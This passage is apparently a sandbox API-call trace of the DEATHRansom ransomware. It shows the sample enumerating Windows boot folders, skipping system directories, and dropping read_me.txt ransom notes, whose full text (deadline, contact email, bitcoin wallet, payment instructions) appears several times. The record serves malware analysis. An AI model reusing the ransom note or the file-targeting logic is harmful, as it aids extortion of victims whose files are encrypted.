lpFileName="\\\\?\\C:\\Boot\\el-GR\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2678 [0073.610] wnsprintfW (in: pszDest=0x8a20070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\.") returned 19 [0073.610] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.610] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.610] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.610] wnsprintfW (in: pszDest=0x8a20070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\..") returned 20 [0073.610] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.610] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.610] wnsprintfW (in: pszDest=0x8a20070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 33 [0073.610] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0073.610] FindClose (in: hFindFile=0x2b2678 | out: hFindFile=0x2b2678) returned 1 [0073.610] wnsprintfW (in: pszDest=0x8a20070, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\read_me.txt") returned 29 [0073.610] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\read_me.txt" (normalized: "c:\\boot\\el-gr\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0073.610] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.610] WriteFile (in: hFile=0x7a8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e35c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e35c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.611] CloseHandle (hObject=0x7a8) returned 1 [0073.611] GetProcessHeap () returned 0x280000 [0073.611] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a20070 | out: hHeap=0x280000) returned 1 [0073.611] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="en-US", cAlternateFileName="")) returned 1 [0073.611] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US") returned 17 [0073.612] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0073.612] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0073.612] StrStrW (lpFirst="en-us", lpSrch="programdata") returned 0x0 [0073.612] StrStrW (lpFirst="en-us", lpSrch="$recycle.bin") returned 0x0 [0073.612] StrStrW (lpFirst="en-us", lpSrch="program files") returned 0x0 [0073.612] StrStrW (lpFirst="en-us", lpSrch="windows") returned 0x0 [0073.612] StrStrW (lpFirst="en-us", lpSrch="all users") returned 0x0 [0073.612] StrStrW (lpFirst="en-us", lpSrch="appdata") returned 0x0 [0073.612] GetProcessHeap () returned 0x280000 [0073.612] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a20070 [0073.612] lstrcpyW (in: lpString1=0x8a20070, lpString2="\\\\?\\C:\\Boot\\en-US" | out: lpString1="\\\\?\\C:\\Boot\\en-US") returned="\\\\?\\C:\\Boot\\en-US" [0073.612] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 6 [0073.612] QueueUserWorkItem (Function=0x40a710, Context=0x8a20070, Flags=0x0) returned 1 [0073.612] GetProcessHeap () returned 0x280000 [0073.612] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a00060 [0073.612] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\*") returned 19 [0073.612] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\en-US\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2678 [0073.613] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\.") returned 19 [0073.613] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.613] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.613] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.613] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\..") returned 20 [0073.613] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.613] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.613] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui") returned 33 [0073.613] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0073.613] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui") returned 33 [0073.613] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0073.613] FindClose (in: hFindFile=0x2b2678 | out: hFindFile=0x2b2678) returned 1 [0073.613] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\read_me.txt") returned 29 [0073.613] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\read_me.txt" (normalized: "c:\\boot\\en-us\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0073.614] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.614] WriteFile (in: hFile=0x7a8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e35c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e35c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.615] CloseHandle (hObject=0x7a8) returned 1 [0073.615] GetProcessHeap () returned 0x280000 [0073.615] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a00060 | out: hHeap=0x280000) returned 1 [0073.615] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="es-ES", cAlternateFileName="")) returned 1 [0073.615] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES") returned 17 [0073.615] lstrcmpW (lpString1="es-ES", lpString2="..") returned 1 [0073.615] lstrcmpW (lpString1="es-ES", lpString2=".") returned 1 [0073.615] StrStrW (lpFirst="es-es", lpSrch="programdata") returned 0x0 [0073.615] StrStrW (lpFirst="es-es", lpSrch="$recycle.bin") returned 0x0 [0073.615] StrStrW (lpFirst="es-es", lpSrch="program files") returned 0x0 [0073.615] StrStrW (lpFirst="es-es", lpSrch="windows") returned 0x0 [0073.615] StrStrW (lpFirst="es-es", lpSrch="all users") returned 0x0 [0073.615] StrStrW (lpFirst="es-es", lpSrch="appdata") returned 0x0 [0073.615] GetProcessHeap () returned 0x280000 [0073.615] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a00060 [0073.615] lstrcpyW (in: lpString1=0x8a00060, lpString2="\\\\?\\C:\\Boot\\es-ES" | out: lpString1="\\\\?\\C:\\Boot\\es-ES") returned="\\\\?\\C:\\Boot\\es-ES" [0073.615] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 7 [0073.615] QueueUserWorkItem (Function=0x40a710, Context=0x8a00060, Flags=0x0) returned 1 [0073.615] GetProcessHeap () returned 0x280000 [0073.615] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a70098 [0073.615] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\*") returned 19 [0073.615] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\es-ES\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2678 [0073.616] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\.") returned 19 [0073.616] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.616] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.616] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.616] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\..") returned 20 [0073.616] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.617] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.617] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 33 [0073.617] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0073.617] FindClose (in: hFindFile=0x2b2678 | out: hFindFile=0x2b2678) returned 1 [0073.617] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\read_me.txt") returned 29 [0073.617] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\read_me.txt" (normalized: "c:\\boot\\es-es\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0073.617] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.617] WriteFile (in: hFile=0x7a8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e35c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e35c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.618] CloseHandle (hObject=0x7a8) returned 1 [0073.618] GetProcessHeap () returned 0x280000 [0073.618] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a70098 | out: hHeap=0x280000) returned 1 [0073.618] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0073.618] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI") returned 17 [0073.618] lstrcmpW (lpString1="fi-FI", lpString2="..") returned 1 [0073.618] lstrcmpW (lpString1="fi-FI", lpString2=".") returned 1 [0073.618] StrStrW (lpFirst="fi-fi", lpSrch="programdata") returned 0x0 [0073.618] StrStrW (lpFirst="fi-fi", lpSrch="$recycle.bin") returned 0x0 [0073.618] StrStrW (lpFirst="fi-fi", lpSrch="program files") returned 0x0 [0073.618] StrStrW (lpFirst="fi-fi", lpSrch="windows") returned 0x0 [0073.618] StrStrW (lpFirst="fi-fi", lpSrch="all users") returned 0x0 [0073.618] StrStrW (lpFirst="fi-fi", lpSrch="appdata") returned 0x0 [0073.618] GetProcessHeap () returned 0x280000 [0073.619] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a70098 [0073.619] lstrcpyW (in: lpString1=0x8a70098, lpString2="\\\\?\\C:\\Boot\\fi-FI" | out: lpString1="\\\\?\\C:\\Boot\\fi-FI") returned="\\\\?\\C:\\Boot\\fi-FI" [0073.619] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 8 [0073.619] QueueUserWorkItem (Function=0x40a710, Context=0x8a70098, Flags=0x0) returned 1 [0073.619] GetProcessHeap () returned 0x280000 [0073.619] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a800a0 [0073.620] wnsprintfW (in: pszDest=0x8a800a0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\*") returned 19 [0073.620] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fi-FI\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2678 [0073.620] wnsprintfW (in: pszDest=0x8a800a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\.") returned 19 [0073.620] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.620] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.620] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, 